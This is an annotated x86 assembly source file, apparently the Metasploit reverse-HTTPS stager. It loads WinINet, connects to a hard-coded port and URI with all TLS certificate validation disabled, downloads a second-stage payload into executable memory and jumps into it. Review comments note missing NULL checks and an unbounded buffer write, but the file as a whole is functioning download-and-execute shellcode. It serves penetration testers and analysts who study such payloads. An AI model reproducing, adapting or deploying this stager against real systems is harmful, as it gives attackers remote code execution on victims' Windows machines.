;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows XP SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
;-----------------------------------------------------------------------------;
[BITS 32]

; Reverse-HTTPS stager block: load wininet, open an HTTPS request to the
; hard-coded host / port / URI, read the response body into an RWX buffer and
; jump into it. Every API call goes through the 'api_call' block (hash-based
; resolver) via 'call ebp'; none of the handles it returns are checked for NULL.
;
; Input: EBP must be the address of 'api_call'.
; Output: this block never returns - it ends with a 'ret' into the downloaded
;         stage. At that point ESI holds the HINTERNET request handle and EDI
;         points at a scratch slot on the stack (see download_prep).
;         NOTE(review): the original header said "EDI will be the socket";
;         nothing in this block places a socket in EDI - confirm what the stage
;         expects before relying on that.
; Clobbers: EAX, EBX, ECX, EDX, ESI, EDI; ESP is also modified (the original
;         header quoted -0x1A0; the exact amount depends on how many retries
;         run - see set_security_options).
;
; SECURITY NOTE: TLS here provides transport encryption only. Every certificate
; check WinINet can perform is switched off (INTERNET_FLAG_IGNORE_CERT_* in
; httpopenrequest, all SECURITY_FLAG_IGNORE_* in set_security_options), so the
; stage is NOT authenticated: whoever can redirect or intercept the connection
; chooses the code that gets executed. Nothing here inspects the HTTP status
; code either, and the download loop does not bound the response against the
; buffer it allocates (see download_more).
load_wininet:
  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack ("net\0", then "wini" below).
  push 0x696e6977        ; ...
  push esp               ; Push a pointer to the "wininet" string on the stack.
  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
  call ebp               ; LoadLibraryA( "wininet" )

internetopen:
  xor edi,edi
  push edi               ; DWORD dwFlags
  push edi               ; LPCTSTR lpszProxyBypass
  push edi               ; LPCTSTR lpszProxyName
  push edi               ; DWORD dwAccessType (PRECONFIG = 0)
  push byte 0            ; NULL pointer
  push esp               ; LPCTSTR lpszAgent ("\x00")
  push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
  call ebp               ; EAX = hInternet (not checked for NULL)

  jmp short dbl_get_server_host ; -> get_server_host, whose call/pop yields &server_host

internetconnect:
  pop ebx                ; Save the hostname pointer (the return address pushed by 'call internetconnect' = server_host)
  xor ecx, ecx
  push ecx               ; DWORD_PTR dwContext (NULL)
  push ecx               ; dwFlags
  push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
  push ecx               ; password
  push ecx               ; username
  push dword 4444        ; PORT (hard-coded here; presumably patched by whatever builds the final stager - TODO confirm)
  push ebx               ; HOSTNAME
  push eax               ; HINTERNET hInternet (from InternetOpenA)
  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
  call ebp               ; EAX = hConnection (not checked for NULL)

  jmp get_server_uri     ; -> 'call httpopenrequest', which pushes &server_uri

httpopenrequest:
  pop ecx                ; ECX = &server_uri ("/12345"), the return address pushed by 'call httpopenrequest'
  xor edx, edx           ; NULL
  push edx               ; dwContext (NULL)
  push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
  ;0x80000000 | ; INTERNET_FLAG_RELOAD
  ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
  ;0x00800000 | ; INTERNET_FLAG_SECURE (HTTPS)
  ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
  ;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID   (cert checks weakened here ...)
  ;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID (... and disabled entirely in set_security_options)
  ;0x00000200 ; INTERNET_FLAG_NO_UI
  push edx               ; accept types
  push edx               ; referrer
  push edx               ; version
  push ecx               ; url
  push edx               ; method (NULL lpszVerb - per the WinINet docs this means GET)
  push eax               ; hConnection
  push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
  call ebp
  mov esi, eax           ; hHttpRequest (not checked for NULL)

set_retry:
  push byte 0x10         ; EBX = 16: number of HttpSendRequest attempts before giving up
  pop ebx

; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
; Re-entered from try_it_again on every retry. The dwFlags dword pushed here is
; never popped by this block, so each retry leaves 4 more bytes on the stack
; (bounded by the 16-attempt limit).
set_security_options:
  push 0x00003380
  ;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
  ;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
  ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
  ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
  ;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
  mov eax, esp           ; EAX = &dwFlags (the dword just pushed)
  push byte 4            ; sizeof(dwFlags)
  push eax               ; &dwFlags
  push byte 31           ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
  push esi               ; hRequest
  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
  call ebp               ; return value ignored

httpsendrequest:
  xor edi, edi
  push edi               ; optional length
  push edi               ; optional
  push edi               ; dwHeadersLength
  push edi               ; headers
  push esi               ; hHttpRequest
  push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
  call ebp
  test eax,eax           ; FALSE = the request could not be sent; the HTTP status is never examined
  jnz short allocate_memory

try_it_again:
  dec ebx                ; one attempt used
  jz failure             ; all attempts failed -> ExitProcess
  jmp short set_security_options

dbl_get_server_host:
  jmp get_server_host    ; second hop (presumably so the jump in internetopen can stay a 2-byte 'jmp short')

get_server_uri:
  call httpopenrequest   ; pushes &server_uri as the return address; httpopenrequest pops it into ECX

server_uri:
  db "/12345", 0x00      ; request path (hard-coded here; presumably patched by the stager builder - TODO confirm)

failure:
  push 0x56A2B5F0        ; hardcoded to exitprocess for size
  call ebp               ; ExitProcess( <whatever is on top of the stack> ); does not return

allocate_memory:
  push byte 0x40         ; PAGE_EXECUTE_READWRITE (RWX: the stage runs straight out of this buffer)
  push 0x1000            ; MEM_COMMIT
  push 0x00400000        ; Stage allocation: 0x400000 = 4 MiB (the old comment said "8Mb"; the constant is 4 MiB)
  push edi               ; NULL as we dont care where the allocation is (EDI is still zero from httpsendrequest)
  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); EAX = base (not checked for NULL)

download_prep:
  xchg eax, ebx          ; place the allocated base address in ebx
  push ebx               ; store a copy of the stage base address on the stack (consumed by the final 'ret')
  push ebx               ; temporary storage for bytes read count (initial value irrelevant; overwritten by InternetReadFile)
  mov edi, esp           ; &bytesRead

; Read the response body 8 KiB at a time, appending at EBX, until
; InternetReadFile reports 0 bytes. SECURITY NOTE: nothing compares EBX
; against base + 0x400000, so a response larger than the 4 MiB allocation
; is written past the end of the buffer.
download_more:
  push edi               ; &bytesRead
  push 8192              ; read length
  push ebx               ; buffer
  push esi               ; hRequest
  push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
  call ebp

  test eax,eax           ; download failed? (FALSE from InternetReadFile)
  jz failure

  mov eax, [edi]         ; EAX = bytes received by this call
  add ebx, eax           ; buffer += bytes_received

  test eax,eax           ; 0 bytes read = end of response
  jnz download_more      ; continue until it returns 0
  pop eax                ; clear the temporary storage; the saved stage base is now on top of the stack

execute_stage:
  ret                    ; dive into the stored stage address (pops the base pushed in download_prep)

get_server_host:
  call internetconnect   ; pushes &server_host as the return address; internetconnect pops it into EBX

server_host:
; The NUL-terminated hostname is expected to sit here, immediately after the
; label. It is not part of this file - presumably appended by whatever builds
; the final stager (TODO confirm).
|